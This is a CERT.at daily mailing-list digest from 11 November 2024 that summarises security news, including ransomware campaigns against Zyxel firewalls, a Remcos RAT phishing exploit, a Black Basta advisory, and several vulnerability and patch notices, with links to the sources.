[CERT-daily] Tageszusammenfassung - 11.11.2024

Mon Nov 11 18:40:46 CET 2024

=====================
= End-of-Day report =
=====================

Timeframe:   Freitag 08-11-2024 18:00 − Montag 11-11-2024 18:00
Handler:     Alexander Riepl
Co-Handler:  Michael Schlagenhaufer

=====================
=       News        =
=====================

∗∗∗ Palo Alto untersucht mögliche Sicherheitslücke in PAN-OS-Webinterface ∗∗∗
---------------------------------------------
Palo Alto untersucht eine angebliche Codeschmuggel-Lücke in der Verwaltungsoberfläche von PAN-OS. Ein Teil betroffener Kunden wird informiert. [..] Palo Alto empfiehlt Kunden dringend, sicherzustellen, dass der Zugang zur Verwaltungsoberfläche korrekt und im Einklang mit den empfohlenen Best-Practices-Richtlinien erfolgt. Dafür stellt das Unternehmen auch eine Anleitung bereit.
---------------------------------------------
https://www.heise.de/-10013896.html


∗∗∗ Zugangsdaten aus 2023 für Zugriff ausgenutzt - "Helldown Leaks"-Ransomware kompromittiert Unternehmen über Zyxel-Firewalls ∗∗∗
---------------------------------------------
Seit etwa Anfang August 2024 werden international Unternehmen durch die Ransomware-Gruppe "Helldown Leaks" verschlüsselt. Als initialer Angriffsvektor können durchgängig Zyxel-Firewalls ausgemacht werden, selbst wenn diese auf dem letzten Software-Stand sind.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/11/zugangsdaten-aus-2023-fur-zugriff-ausgenutzt-helldown-leaks-ransomware-kompromittiert-unternehmen-uber-zyxel-firewalls


∗∗∗ Testing the Koord2ool ∗∗∗
---------------------------------------------
As part of the EU-funded project “AWAKE”, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time.  We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time.
---------------------------------------------
https://www.cert.at/en/blog/2024/11/testing-the-koord2ool


∗∗∗ Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. [..] The malicious Excel document is designed to exploit a known remote code execution flaw in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file ("cookienetbookinetcahce.hta") from a remote server ("192.3.220[.]22") and launch it using mshta.exe.
---------------------------------------------
https://thehackernews.com/2024/11/cybercriminals-use-excel-exploit-to.html


∗∗∗ #StopRansomware: Black Basta ∗∗∗
---------------------------------------------
Updates to this advisory, originally published May 10, 2024 [..] The advisory was updated to reflect new TTPs employed by Black Basta affiliates, as well as provide current IOCs/remove outdated IOCs for effective threat hunting.
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a


∗∗∗ Cyberattack causes credit card readers to malfunction in Israel ∗∗∗
---------------------------------------------
As reported by the Jerusalem Post, the cause was a distributed denial-of-service attack (DDoS) that targeted the payment gateway company Hyp’s CreditGuard product. The attack disrupted communications between the card terminals and the wider payment system, but was not capable of stealing information or payments. 
---------------------------------------------
https://therecord.media/cyberattack-causes-credit-card-readers-in-israel-to-malfunction


∗∗∗ Malware Steals Account Credentials ∗∗∗
---------------------------------------------
It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert scripts that extract data from the checkout forms to siphon fields like the cardholder name, card number and expiration date. [..] However, every now and then we encounter a case where in addition to that they are also looking to steal details for accounts that customers have created on these sites along with admin account credentials. We’ll explore one such case.
---------------------------------------------
https://blog.sucuri.net/2024/11/malware-steals-account-credentials.html


∗∗∗ Known Attacks On Elliptic Curve Cryptography ∗∗∗
---------------------------------------------
In recent years the Elliptic Curve Cryptography approach has become popular due to its high efficiency and strong security. The purpose of this article is to present this topic in a relatively clearer way than it exists today on the internet.
---------------------------------------------
https://github.com/elikaski/ECC_Attacks


∗∗∗ Pishi: Coverage guided macOS KEXT fuzzing ∗∗∗
---------------------------------------------
In this blog post I will try to explain everything as clearly as possible so that even those who are not familiar with fuzzing can enjoy and understand it. I’ll break down the concepts, provide relatable examples, and resources, My goal is to make fuzzing approachable and interesting.
---------------------------------------------
https://r00tkitsmm.github.io/fuzzing/2024/11/08/Pishi.html


=====================
=  Vulnerabilities  =
=====================

∗∗∗ Veeam Backup Enterprise Manager: Unbefugte Zugriffe durch Angreifer möglich ∗∗∗
---------------------------------------------
Setzen Angreifer erfolgreich an der Schwachstelle (CVE-2024-40715 "hoch") an, können sie die Authentifizierung umgehen und Verbindungen als Man-in-the-Middle belauschen. Wie das im Detail ablaufen könnte, ist bislang nicht bekannt. [..] Ein Sicherheitspatch steht zum Download bereit.
---------------------------------------------
https://www.heise.de/-10018234.html


∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (podman), Debian (guix, libarchive, and nss), Fedora (expat, iaito, opendmarc, python-werkzeug, radare2, squid, and xorg-x11-server), Mageia (htmldoc, libheif, nspr, nss, firefox & rust, python-urllib3, python-werkzeug, quictls, ruby-webrick, and thunderbird), Oracle (firefox and NetworkManager-libreswan), SUSE (apache2, chromedriver, chromium, coredns, expat, govulncheck-vulndb, httpcomponents-client, java-17-openjdk, java-21-openjdk, libheif, python-wxPython, python311, python312, qbittorrent, ruby3.3-rubygem-actionmailer, ruby3.3-rubygem-actiontext, ruby3.3-rubygem-puma, ruby3.3-rubygem-rails, and virtualbox), and Ubuntu (openjdk-17, openjdk-21, openjdk-8, openjdk-lts, and qemu).
---------------------------------------------
https://lwn.net/Articles/997774/

-- 
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily